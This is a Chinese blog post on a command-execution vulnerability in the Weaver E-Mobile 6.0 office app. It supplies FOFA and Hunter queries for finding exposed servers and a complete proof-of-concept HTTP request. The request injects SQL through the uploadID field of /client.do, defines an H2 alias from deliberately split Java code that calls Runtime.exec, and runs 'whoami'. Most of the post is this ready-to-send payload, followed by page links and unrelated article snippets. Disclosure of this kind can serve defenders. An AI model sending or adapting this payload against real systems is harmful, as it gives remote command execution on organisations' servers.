首页 > 其他分享 >泛微E-Mobile 6.0 命令执行漏洞

泛微E-Mobile 6.0 命令执行漏洞

时间:2023-09-01 17:46:24浏览次数:203  
标签:java Mobile WebKitFormBoundaryvVPZWWKFq310ISXS Content 6.0 泛微

漏洞描述

泛微E-Mobile 6.0 存在命令执行漏洞(注:影响版本不确定,如下图6.6版本的也成功了)
版本信息:E-Mobile 6.0

漏洞复现

fofa语法:fofa:app="泛微-EMobile"
hunter:app.name="泛微 e-mobile OA"
登录页面如下:

POC:

POST /client.do HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Length: 1125

------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="method"

getupload
------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="uploadID"

1';CREATE ALIAS if not exists abcd AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL abcd('whoami');--
------WebKitFormBoundaryvVPZWWKFq310ISXS--


参考链接:https://mp.weixin.qq.com/s?__biz=Mzk0ODM0MjA0OA==&mid=2247483759&idx=1&sn=8c752411ca579df6fa7bcdbc557a1bab&chksm=c3685d20f41fd436f02cda8c023b139f4016acce0a904e6f2d04ecca752196d613e7232ced30&scene=126&sessionid=1691313401&key=ada403088d2f593d2c8c9d6802e8f94b6dc8f05cab3d4e301d2f0264178cdbb08cd1dc68ba638e13b6bed5e424578ecf90b18bcfdb33c173c780228a965d65f53cd9d31918c0d39dcb674a6245e132ddf627ba169f1f2dce7d5e7a1bb521fcd89203680002bfa7b92cce60c1a79e47a8876ca4b7b9c21b8201d93b445a9c31b3&ascene=15&uin=MTI5ODM0MTMwNQ%3D%3D&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&session_us=gh_03c635669fc8&exportkey=n_ChQIAhIQBWlE1qKgUsUO7LGAtvVARBLvAQIE97dBBAEAAAAAAHJtBMqVmMUAAAAOpnltbLcz9gKNyK89dVj0aRA%2BAqqmEDuOMMC1jRwkwpcWCHD%2BttrytoI9ZInxCGOIRIPMc%2BHW8QbR4hNPxQBJ4Jq5ZLnCDEu%2FBbodJsvyG6wjwUUTkGEI5qL99p%2FNsL8Nhvp2IsGY4SkpazoK9B8hU9fmKXrB2qXkbQt%2FRJ1qwK%2FCtxDGLoba0ZnIIslBnIpcVVb%2FQ2Vf%2FMI23UwkS6nQcF7aptjVZ%2Bau0435ikJqR3t%2F8ZxcBWKmLHtnxazU5Iuc%2Bid6WBKlbKw32GB4OfDShPk%2BvAyzG6mR&acctmode=0&

标签:java,Mobile,WebKitFormBoundaryvVPZWWKFq310ISXS,Content,6.0,泛微
From: https://www.cnblogs.com/pursue-security/p/17672543.html

相关文章

  • 基于MobileNet的图像分割模型
    整体架构流程数据处理模型构建以及模型训练模型测试IntelOneAPI使用数据处理cityscapes-dataset是一个用于计算机视觉领域的数据集,主要用于场景理解和自动驾驶等任务。该数据集包含来自德国50个城市的街景图像,其中包括高分辨率图像、标注图像和相机参数。标注图像包括像素级别的......
  • iOS证书(.p12)和描述文件(.mobileprovision)申请
    5+App开发Apple证书iOS证书iOS有两种证书和描述文件:证书类型使用场景开发(Development)证书和描述文件用于开发测试,在HBuilder中打包后可在真机环境通过Safari调试发布(Distribution)证书和描述文件用于提交Appstore,在HBuilder中打包后可使用ApplicationLoader提交到Appstore审......
  • 苹果证书(免费) + 打包ipa + 上传app store在Hbuilder里面打包ipa包到没越狱的手机上安
    苹果证书(免费)+打包ipa+上传appstore 在Hbuilder里面打包ipa包到没越狱的手机上安装时,是需要p12文件跟.mobileprovision的证书的,这里可以超简单不需要Mac也可以申请到前提:先安装好Appuploader——>http://www.applicationloader.net/blog/zh/72.html1、打开软件,使用开发者账......
  • 【6.0】Docker部署Redis
    【一】拉取Redis镜像dockerpullredis该命令将从DockerHub上获取最新的Redis镜像,并将其下载到本地。【二】创建数据和配置目录mkdir/root/datavim/root/redis.conf第一行命令创建一个目录用于持久化Redis数据。第二行命令使用vim编辑器创建一个Redis配置文件,文件......
  • zabbix5.0升级到6.0大体步骤
    Zabbix5.0升级至6.0大体步骤1现状当前zabbix监控的架构为zabbix+多个proxy的架构。具体信息如下:zabbixserver:源码安装,5.0.12版本,MySQL5.7版本(源码安装)zabbixproxy:yum安装,5.0.12版本,MySQL5.7版本(源码安装)2升级思路zabbixserverdb的数据保留,proxydb的数据丢弃。......
  • Ubuntu16.04安装OpenEXR与openexr-python
    1,安装库文件sudoapt-getinstallopenexr 2,安装python接口(注意版本问题) 我使用的python3.6,安装1.3.2版本的没有问题,如果python是3.8,可以尝试选择安装1.3.9等高版本pipinstallOpenEXR==1.3.2-ihttps://pypi.tuna.tsinghua.edu.cn/simple 如果没有指定OpenEXR的......
  • odoo16.0 企业微信解决方案
    需求背景企业微信作为当前企业内部沟通的几大内部IM软件之一,其优势在于能够跟微信打通,方便与客户联系。很多客户都有需求,要在企业微信内部对工作进行及时通知和反馈,在企业微信中进行审批,乃至统计员工的考勤和费用等等。本模块将展示,通过与odoo的关联,我们将如何利用企业微信提......
  • 如何在.Net6.0中使用JWT
    JWT全名JSONWebToken用来进行我们的Api进口保护,那么这个JWT该怎么使用:首先我们需要下载NuGet包: 然后下载这两个NuGet包第一个是JWT的官方包用来进行和核心操作,第二个是用来进行鉴权用。那麽现在我么就要开始配置JWT了首先我们需要创建一个类:定义注册存入TokenHelper类,方......
  • .NET敏捷开发框架-RDIFramework.NET V6.0发布
    1、RDIFramework.NET敏捷开发框架介绍RDIFramework.NET敏捷开发框架,是我司重磅推出的基于最新.NET6+与.NETFramework的快速信息化系统开发、整合框架,为企业快速构建跨平台、企业级的应用提供了强大支持。开发人员不需要开发系统的基础功能和公共模块,框架自身提供了强大的函数......
  • windows远程桌面到ubuntu16.04
    环境ubuntu:16.04windows:windows10目标让windows可以使用RemoteDesktop客记端远程到ubuntu16.04安装事宜windowns无需安装ubuntu16.04需要安装xrdp和xfce4安装sudoaptinstallxrdpxfce4查看安装版本,发现默认安装的是xrdp0.6.1修改配置sudoechoxfce4-sessi......